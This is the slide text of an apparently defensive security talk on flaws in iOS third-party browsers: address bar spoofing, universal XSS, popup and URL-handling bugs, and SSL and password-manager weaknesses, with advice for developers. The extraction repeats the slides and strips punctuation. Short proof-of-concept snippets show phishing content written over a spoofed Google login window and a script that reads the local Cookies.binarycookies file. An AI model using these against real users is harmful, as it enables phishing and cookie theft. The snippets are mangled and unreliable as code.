bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 6: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/6.jpg)
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 7: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/7.jpg)
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
